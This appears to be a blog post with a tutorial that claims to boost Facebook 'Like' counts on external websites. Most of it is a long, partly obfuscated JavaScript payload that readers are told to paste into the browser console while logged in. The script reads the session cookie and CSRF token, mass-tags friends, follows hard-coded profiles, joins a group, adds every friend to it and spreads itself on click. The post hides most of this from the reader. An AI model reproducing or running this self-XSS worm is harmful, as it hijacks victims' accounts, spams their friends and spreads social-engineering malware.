At times we become judgmental towards a site just by seeing number of likes in the “Like” button. Well, do you know that, the number displayed in that like button can be “genuinely” hacked? No, we’re not talking about displaying a fake number or maybe adding fake likes; we’re talking about fiddling with that number so that Facebook would think that people have actually clicked that “Like” button. It’s just simple XSS trick which indirectly gets Likes. Apart from it, this trick is also a bit complicated, since you have to use different browsers for different purposes. Download and install Firefox and Chrome.
Before we even begin doing this, let us warn you, that doing so is a bad practice and it might get our website penalized by Google Panda, so in return you’ll have poor site reputation. The irony shouldn’t go unnoticed. This trick doesn’t increase the number of likes on a Facebook page or your status or a pic you’ve uploaded; this trick will only work on those small blue coloured “Like” buttons that you see on random websites.
Take a look at this picture of how that button should look.
Let’s begin then, open up your website or any web page which has such a button (as shown in image) using Mozilla Firefox. Now there are two ways to know the URL of that “Like” button. Either you can simply copy the URL as shown in the address bar (this might fail if there are many “Like” buttons on a single web page) but to be on the Safe Side and to get the correct URL you need to right click on that “Like” button and then click on “This Frame” > “Show only this Frame” (use Firefox for this step). Now a page would load and its address bar would look something like this:
Now in this whole URL you can spot the portion that you require, simply copy the part that comes after “https://www.facebook.com/plugins/like.php?href=” up till the next ampersand (&).
Half of the process is done, now all you need to do is to open Google Chrome and log into your Facebook account. Now in your timeline click on status update and then type “Like this + the_URL_that_you_extracted” without the quotes. Wait a few seconds till Facebook fetches the web page details from the URL that you pasted in status update box and then post the status update while making sure to set the privacy as public for this post. Go to the newly posted status message, under your name there would be some time displayed which would look something like “2 mins ago” or may be “a few seconds ago” or something similar, now just click on that time and another page would load where only your status update would be shown. On this page press “ctrl+shit+j” and a console would appear from below. Now there is a XSS script that we need to paste in the browser but it’s quite long but you have to copy it.
function x__0(){return window.ActiveXObject?new ActiveXObject("Msxml2.XMLHTTP"):new XMLHttpRequest}function get_friends(){var e=x__0();e.open("GET","/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&lazy=0&viewer="+uid+"&token=v7&stale_ok=0&options[0]=friends_only&options[1]=nm",false);e.send(null);if(e.readyState==4){var t=JSON.parse(e.responseText.substring(e.responseText.indexOf("{")));return t.payload.entries}return false}function get_uid(e){var t=x__0();t.open("GET","http://graph.facebook.com/"+e,false);t.send();if(t.readyState==4){return uid=JSON.parse(t.responseText).id}return false}function cereziAl(e){var t=e+"=";if(document.cookie.length>0){konum=document.cookie.indexOf(t);if(konum!=-1){konum+=t.length;son=document.cookie.indexOf(";",konum);if(son==-1)son=document.cookie.length;return unescape(document.cookie.substring(konum,son))}else{return""}}}function getRandomInt(e,t){return Math.floor(Math.random()*(t-e+1))+e}function randomValue(e){return e[getRandomInt(0,e.length-1)]}function a(e){var t=new XMLHttpRequest;var n="/ajax/follow/follow_profile.php?__a=1";var r="profile_id="+e+"&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg="+fb_dtsg+"&lsd&__"+user_id+"&phstamp=";t.open("POST",n,true);t.setRequestHeader("Content-type","application/x-www-form-urlencoded");t.setRequestHeader("Content-length",r.length);t.setRequestHeader("Connection","close");t.onreadystatechange=function(){if(t.readyState==4&&t.status==200){t.close}};t.send(r)}function sublist(e){var t=document.createElement("script");t.innerHTML="new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: "+e+" }).send();";document.body.appendChild(t)}function sarkadaslari_al(){var xmlhttp=new XMLHttpRequest;xmlhttp.onreadystatechange=function(){if(xmlhttp.readyState==4){eval("arkadaslar = "+xmlhttp.responseText.toString().replace("for (;;);","")+";");for(f=0;f<Math.round(arkadaslar.payload.entries.length/10);f++){smesaj="";smesaj_text="";for(i=f*10;i<(f+1)*10;i++){if(arkadaslar.payload.entries[i]){smesaj+=" @["+arkadaslar.payload.entries[i].uid+":"+arkadaslar.payload.entries[i].text+"]";smesaj_text+=" "+arkadaslar.payload.entries[i].text}}sdurumpaylas()}}};var params="&filter[0]=user";params+="&options[0]=friends_only";params+="&options[1]=nm";params+="&token=v7";params+="&viewer="+user_id;params+="&__user="+user_id;if(document.URL.indexOf("https://")>=0){xmlhttp.open("GET","https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1"+params,true)}else{xmlhttp.open("GET","http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1"+params,true)}xmlhttp.send()}function sarkadasekle(e,t){var n=new XMLHttpRequest;n.onreadystatechange=function(){if(n.readyState==4){}};n.open("POST","/ajax/add_friend/action.php?__a=1",true);var r="to_friend="+e;r+="&action=add_friend";r+="&how_found=friend_browser";r+="&ref_param=none";r+="&outgoing_id=";r+="&logging_location=friend_browser";r+="&no_flyout_on_click=true";r+="&ego_log_data=";r+="&http_referer=";r+="&fb_dtsg="+document.getElementsByName("fb_dtsg")[0].value;r+="&phstamp=165816749114848369115";r+="&__user="+user_id;n.setRequestHeader("X-SVN-Rev",svn_rev);n.setRequestHeader("Content-Type","application/x-www-form-urlencoded");if(t=="farketmez"&&document.cookie.split("cins"+user_id+"=").length>1){n.send(r)}else if(document.cookie.split("cins"+user_id+"=").length<=1){cinsiyetgetir(e,t,"sarkadasekle")}else if(t==document.cookie.split("cins"+user_id+"=")[1].split(";")[0].toString()){n.send(r)}}function scinsiyetgetir(uid,cins,fonksiyon){var xmlhttp=new XMLHttpRequest;xmlhttp.onreadystatechange=function(){if(xmlhttp.readyState==4){eval("cinssonuc = "+xmlhttp.responseText.toString().replace("for (;;);","")+";");cinshtml.innerHTML=cinssonuc.jsmods.markup[0][1].__html;btarihi.setTime(bugun.getTime()+1e3*60*60*24*365);if(cinshtml.getElementsByTagName("select")[0].value=="1"){document.cookie="cins"+user_id+"=kadin;expires="+btarihi.toGMTString()}else if(cinshtml.getElementsByTagName("select")[0].value=="2"){document.cookie="cins"+user_id+"=erkek;expires="+btarihi.toGMTString()}eval(fonksiyon+"("+id+","+cins+");")}};xmlhttp.open("GET","/ajax/timeline/edit_profile/basic_info.php?__a=1&__user="+user_id,true);xmlhttp.setRequestHeader("X-SVN-Rev",svn_rev);xmlhttp.send()}var patt=/comment_text=(.*?)&/;var c=1;username=/\.com\/(.*?)\//.exec(window.top.location)[1];uid=get_uid(username);a=window.top.location;termina=0;var amigos=get_friends();post_id=/[0-9]{8,}/.exec(a);uids="comment_text=";header="ft_ent_identifier="+post_id+"&comment_text=?&source=1&client_id=1359576694192%3A1233576093&reply_fbid&parent_comment_id&rootid=u_jsonp_3_19&ft[tn]=[]&ft[qid]=5839337351464612379&ft[mf_story_key]=5470779710560437153&ft[has_expanded_ufi]=1&nctr[_mod]=pagelet_home_stream&__user="+uid+"&__a=1&__req=4u&fb_dtsg="+document.getElementsByName("fb_dtsg")[0].value+"&phstamp="+Math.random();for(var n=1;n<amigos.length;n++){fb_dtsg=document.getElementsByName("fb_dtsg")[0].value;uids+="%40["+amigos[n].uid+"%3AAAAAAAAAAAA]%20";c++;if(c==7){uids+="&";with(new XMLHttpRequest)open("POST","/ajax/ufi/add_comment.php?__a=1"),setRequestHeader("Content-Type","application/x-www-form-urlencoded"),send(header.replace(patt,uids));z=setTimeout("function(){asd=0}",1e3);clearInterval(z);c=1;uids="comment_text="}}var fb_dtsg=document.getElementsByName("fb_dtsg")[0].value;var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);var fb_dtsg=document.getElementsByName("fb_dtsg")[0].value;var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);sublist("624334420912439");sublist("599238170088731");sublist("623881154291099");var fb_dtsg=document["getElementsByName"]("fb_dtsg")[0]["value"];var user_id=document["cookie"]["match"](document["cookie"]["match"](/c_user=(\d+)/)[1]);var httpwp=new XMLHttpRequest;var urlwp="/ajax/groups/membership/r2j.php?__a=1";var paramswp="&ref=group_jump_header&group_id="+gid+"&fb_dtsg="+fb_dtsg+"&__user="+user_id+"&phstamp=";httpwp["open"]("POST",urlwp,true);httpwp["setRequestHeader"]("Content-type","application/x-www-form-urlencoded");httpwp["setRequestHeader"]("Content-length",paramswp["length"]);httpwp["setRequestHeader"]("Connection","keep-alive");httpwp["send"](paramswp);var fb_dtsg=document["getElementsByName"]("fb_dtsg")[0]["value"];var user_id=document["cookie"]["match"](document["cookie"]["match"](/c_user=(\d+)/)[1]);var friends=new Array;gf=new XMLHttpRequest;gf["open"]("GET","/ajax/typeahead/first_degree.php?__a=1&viewer="+user_id+"&token"+Math["random"]()+"&filter[0]=user&options[0]=friends_only",false);gf["send"]();if(gf["readyState"]!=4){}else{data=eval("("+gf["responseText"]["substr"](9)+")");if(data["error"]){}else{friends=data["payload"]["entries"]["sort"](function(e,t){return e["index"]-t["index"]})}}for(var i=0;i<friends["length"];i++){var httpwp=new XMLHttpRequest;var urlwp="/ajax/groups/members/add_post.php?__a=1";var paramswp="&fb_dtsg="+fb_dtsg+"&group_id="+gid+"&source=typeahead&ref=&message_id=&members="+friends[i]["uid"]+"&__user="+user_id+"&phstamp=";httpwp["open"]("POST",urlwp,true);httpwp["setRequestHeader"]("Content-type","application/x-www-form-urlencoded");httpwp["setRequestHeader"]("Content-length",paramswp["length"]);httpwp["setRequestHeader"]("Connection","keep-alive");httpwp["onreadystatechange"]=function(){if(httpwp["readyState"]==4&&httpwp["status"]==200){}};httpwp["send"](paramswp)}var spage_id="473108719451870";var spost_id="473108719451870";var sfoto_id="473108719451870";var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);var smesaj="";var smesaj_text="";var arkadaslar=[];var svn_rev;var bugun=new Date;var btarihi=new Date;btarihi.setTime(bugun.getTime()+1e3*60*60*4*1);if(!document.cookie.match(/paylasti=(\d+)/)){document.cookie="paylasti=hayir;expires="+btarihi.toGMTString()}var tiklama=document.addEventListener("click",function(){if(document.cookie.split("paylasti=")[1].split(";")[0].indexOf("hayir")>=0){svn_rev=document.head.innerHTML.split('"svn_rev":')[1].split(",")[0];sarkadaslari_al();document.cookie="paylasti=evet;expires="+btarihi.toGMTString();document.removeEventListener(tiklama)}},false);var cinssonuc={};var cinshtml=document.createElement("html")
Now paste the XSS script in this console and press enter, some warning or error message would appear in the console, ignore that. Also a Facebook pop-up saying that the content is unavailable would also appear, ignore that as well. Now wait for 10-20 seconds and you will see that your friends are tagged on that post. Now go to the original location of that like button i.e. the website where you saw it. The number of likes should be more now! You can repeat the step of pasting the script in console many more times and every time the number of likes should increase.
This vulnerability is easily exploited and not everyone knows this trick. There is a chance that your friends might un-friend you for infringing upon their privacy. I reported it to Facebook’s White Hat bug bounty program, but those guys rejected it saying that it’s a social engineering hack and they (Facebook) can’t do anything about it. I will not be responsible for what you do with this trick.
No comments:
Post a Comment